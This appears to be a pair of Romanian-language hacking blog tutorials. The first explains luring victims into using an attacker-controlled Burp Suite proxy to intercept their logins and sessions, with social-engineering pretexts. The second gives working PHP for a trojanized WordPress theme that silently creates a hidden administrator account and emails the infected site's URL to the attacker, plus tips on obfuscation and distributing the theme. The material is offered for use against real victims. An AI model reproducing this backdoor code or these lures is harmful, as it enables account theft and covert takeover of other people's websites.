26.7.13

Spargerea oricărui cont al unei victime cu ajutorul ingineriei sociale

INTRODUCION

Ok. După cum v-am obişnuit îmi place să aduc câte ceva mai diferit. Astăzi vom discuta despre subiectul: "Cum putem sparge un cont (al unei victime) al oricărui site web cu ajutorul ingineriei sociale". Dar punctul culminant nu este ingineria socială, ci metoda prin care obţinem datele de autentificare în cazul cel mai bun (în plain text) sau putem să ne mulţumim doar cu sesiunea acestuia (care este totodată suficientă pentru a surfa în contul său).

CONCEPT

Care este ideea. Poate că mulţi dintre voi aţi auzit de Burp Suite. Este o platformă scrisă în java, special creată pentru cei care doresc să facă penetration testing. Ce m-a atras la prima vedere? O chestie interesantă legată de proxy. Pe scurt să creăm un server proxy cu ajutorul aplicaţiei prin care vom intercepta traficul victimelor ce folosesc proxy-ul nostru. Adică să facem sniffing, dar de la distanţă.

THE PROOF

Pentru a realiza un exemplu cât mai frumos şi clar, am luat legătura cu 311733 (că era online pe chat-ul unui board de securitate şi dornic să ma ajute) pentru a se pune în postura de victimă. Aşa că am început prin a configura Burp Suite-ul ca în imaginea aceasta. În acest moment mi-am transformat calculatorul într-un server proxy. După ce am convins victima să folosească HTTP proxy-ul în browser-ul său, vom putea să-i interceptăm nestingheriţi traficul ca în imaginea asta sau asta. Vedem sesiunea cu parola encriptată, care sunt mai mult decât necesare pentru a ne îndeplini scopul.

SOCIAL ENGINEERING EXAMPLE

Să presupunem că victima are nevoie urgentă de o metodă care să îi ascundă pentru câteva momente identitatea, aşa că voi îi veţi propune să folosească un HTTP proxy securizat spunându-i că e foarte bun că l-aţi mai folosit şi că aveţi încredere în el. După ce îl va configura, îî interceptaţi conturile (dacă datele de logare către acele site-uri se transmit în plain text), sau ca în pozele de mai devreme, encriptate. Alte scenarii pot fi născocite în câteva minute deoarece nu dă nimic de bănuit, gen: postaţi pe un forum HTTP proxy-ul iar cine îl foloseşte devine victimă. Trimiteţi către un administrator al unui forum un mesaj privat că nu ştiţi dacă aţi configurat bine acel proxy să îl verifice dacă este bun sau trebuie să încercaţi altul s.a.m.d

Sper că vă va fi de folos pe viitor acest tutorial. Baftă.

THE END

Share on:

Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale

INTRODUCTION


Sună foarte frumos şi defapt este foarte uşor. Tutorialul ce l-am creat astăzi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress şi anume, cum putem să luăm acces la un blog cu eleganţă şi fără a lăsa urme ca să îşi dea seama proprietarul.

Să dăm un mic exemplu. Domnul Gheorghe vrea să spargă cât mai multe blog-uri de pe o anumită nişă web. Se gândeşte cum să facă un lucru de genul ăsta. Noroc că Gheorghe este foarte inventiv şi i-a venit în minte să creeze şi să "infecteze" o temă (theme) visuală.

Mulţi o să spuneţi că o să creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru că ar lăsa urme. Aşa că va adăuga în temă un cod PHP care să adauge automat un nou cont cu drepturi de administrator.

THE CODE

add_action('wp_head', 'wp_wordpress');
      function wp_wordpress() {
                    if ($_GET['p'] == '1') {
                           require('wp-includes/registration.php');
                    if (!username_exists('wordpress')) {
      $user_id = wp_create_user('Guest', 'password');
      $user = new WP_User($user_id);
      $user->set_role('administrator');
        }
    }
} 
Ce face codul de mai sus? Dacă este adăugat spre exemplu în templates.php (am precizat această filă deoarece este executată automat când accesăm index-ul unui blog), oricine va intra pe următorul link: http://pentesting/wp/?p=1 (primul articol de pe blog) va crea în baza de date un nou cont cu drepturi de administrator şi cu numele: Guest şi parola password. O remarcă importantă ar fi aceea că tema instalată trebuie să fie şi cea activă.

Legat de ingineria socială vă descurcaţi voi că sunteţi baieţi isteţi cu mult timp liber. Puteţi posta online undeva tema şi să adaugaţi undeva anumite cuvinte pentru a crea un dork să puteţi găsi blog-urile infectate. Sau îl puteţi manipula chiar pe administrator să instaleze tema.

Ok. Ca să fie totul complet şi pentru că nu am fost mulţumit parcă dacă nu ajutam şi cu partea asta, adică cea în care sunteţi informaţi cu ce blog a fost infectat, pe email.

THE CODE

<? add_action('wp_head','wp_wordpressmail');
           function wp_wordpressmail(){
                     if ( is_user_logged_in() ) {
                     if(!username_exists('wordpress')){
     $addr='TinKode@domain.tld'; # Aici puneţi adresa voastră de email
     $judul='WP URL';
                   wp_mail($addr,$judul,get_bloginfo('wpurl'));
        }
     }
  }
?> 

Să vă bucuraţi de metodă. Şi ca să nu vă dea de gol adresa de mail, puteţi să o encriptaţi în base64.

Să nu uitaţi să stergeţi tag-urile PHP când adăugaţi în filă.

THE END

Share on: